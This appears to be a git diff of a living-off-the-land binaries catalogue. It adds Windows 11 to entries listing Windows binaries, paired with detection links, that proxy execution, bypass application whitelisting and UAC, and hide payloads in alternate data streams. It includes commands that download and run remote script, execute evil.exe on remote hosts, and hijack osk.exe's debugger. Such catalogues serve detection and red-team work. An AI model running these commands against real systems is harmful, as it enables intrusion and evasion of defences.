OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: rundll32.exe -sta {CLSID}
|
||||
Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
|
||||
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10 (and likely previous versions)
|
||||
OperatingSystem: Windows 10 (and likely previous versions), Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\runonce.exe
|
||||
- Path: C:\Windows\SysWOW64\runonce.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
|
||||
Description: Modifies an existing service and executes the file stored in the ADS.
|
||||
Usecase: Execute binary file hidden inside an alternate data stream
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\sc.exe
|
||||
- Path: C:\Windows\SysWOW64\sc.exe
|
||||
|
@ -11,13 +11,13 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1053.005
|
||||
OperatingSystem: Windows
|
||||
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
|
||||
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
|
||||
Description: Create a scheduled task on a remote computer for persistence/lateral movement
|
||||
Usecase: Create a remote task to run daily relative to the the time of creation
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1053.005
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\schtasks.exe
|
||||
- Path: c:\windows\syswow64\schtasks.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
||||
Description: Executes calc.cmd from remote server
|
||||
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\scriptrunner.exe
|
||||
- Path: C:\Windows\SysWOW64\scriptrunner.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\stordiag.exe
|
||||
- Path: c:\windows\syswow64\stordiag.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.012
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\verclsid.exe
|
||||
- Path: C:\Windows\SysWOW64\verclsid.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Windows Mail\wab.exe
|
||||
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
||||
|
@ -10,28 +10,28 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: wmic.exe process call create calc
|
||||
Description: Execute calc from wmic
|
||||
Usecase: Execute binary from wmic to evade defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
||||
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
|
||||
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
|
||||
Description: Execute evil.exe on the remote system.
|
||||
Usecase: Execute binary on a remote system
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
|
||||
Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
|
||||
Usecase: Execute binary with scheduled task created with wmic on a remote computer
|
||||
@ -52,14 +52,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
|
||||
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
|
||||
Usecase: Execute script from remote system
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wbem\wmic.exe
|
||||
- Path: C:\Windows\SysWOW64\wbem\wmic.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\WorkFolders.exe
|
||||
Detection:
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
|
||||
Description: Download and execute script stored in an alternate data stream
|
||||
Usecase: Execute hidden code to evade defensive counter measures
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wscript.exe
|
||||
- Path: C:\Windows\SysWOW64\wscript.exe
|
||||
@ -31,7 +31,7 @@ Detection:
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- IOC: Wscript.exe executing code from alternate data streams
|
||||
- IOC: DotNet CLR libraries loaded into wscript.exe
|
||||
- IOC: DotNet CLR Usage Log - wscript.exe.log
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: UAC bypass
|
||||
Privileges: User
|
||||
MitreID: T1548.002
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wsreset.exe
|
||||
Code_Sample:
|
||||
|
@ -10,21 +10,21 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
|
||||
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
|
||||
Usecase: Run a com object created in registry to evade defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
|
||||
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\xwizard.exe
|
||||
- Path: C:\Windows\SysWOW64\xwizard.exe
|
||||
|
@ -10,35 +10,35 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
|
||||
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
|
||||
Usecase: Run local or remote script(let) code through INF file specification.
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll
|
||||
Description: Launch a DLL payload by calling the RegisterOCX function.
|
||||
Usecase: Load a DLL payload.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
|
||||
Description: Launch an executable by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
|
||||
Description: Launch command line by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\advpack.dll
|
||||
- Path: c:\windows\syswow64\advpack.dll
|
||||
|
@ -1,29 +1,29 @@
|
||||
---
|
||||
Name: Dfshim.dll
|
||||
Description: ClickOnce engine in Windows used by .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||
Usecase: Use binary to bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||
Resources:
|
||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
Name: Dfshim.dll
|
||||
Description: ClickOnce engine in Windows used by .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||
Usecase: Use binary to bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||
Resources:
|
||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -10,33 +10,35 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows, Windows 11 (!!!)
|
||||
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
|
||||
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
|
||||
Usecase: Run local or remote script(let) code through INF file specification.
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows, Windows 11 (!!!)
|
||||
- Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
|
||||
Description: Launch a DLL payload by calling the RegisterOCX function.
|
||||
Usecase: Load a DLL payload.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows, Windows 11 (!!!)
|
||||
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
|
||||
Description: Launch an executable by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows, Windows 11 (!!!)
|
||||
- Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
|
||||
Description: Launch command line by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows, Windows 11 (!!!)
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\ieadvpack.dll
|
||||
- Path: c:\windows\syswow64\ieadvpack.dll
|
||||
|
@ -10,19 +10,21 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
|
||||
Description: Launch an executable by calling the ShellExec_RunDLL function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
|
||||
Description: Launch command line by calling the ShellExec_RunDLL function.
|
||||
Usecase: Run an executable payload.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\shell32.dll
|
||||
- Path: c:\windows\syswow64\shell32.dll
|
||||
|
@ -4,13 +4,13 @@ Description: PowerShell Diagnostic Script
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
|
||||
- Command: 'powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
|
||||
Description: Proxy execute Managed DLL with PowerShell
|
||||
Usecase: Execute proxied payload with Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well)
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
|
||||
Code_Sample:
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
|
||||
Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
|
||||
Usecase: Proxy execution from script
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\manage-bde.wsf
|
||||
Code_Sample:
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well)
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
|
||||
Code_Sample:
|
||||
|
@ -10,21 +10,21 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
|
||||
Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
|
||||
Usecase: Proxy execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
|
||||
Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location
|
||||
Usecase: Execute aribtrary, unsigned code via XSL script
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\winrm.vbs
|
||||
- Path: C:\Windows\SysWOW64\winrm.vbs
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
|
||||
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
|
||||
|
Loading…
Reference in New Issue
Block a user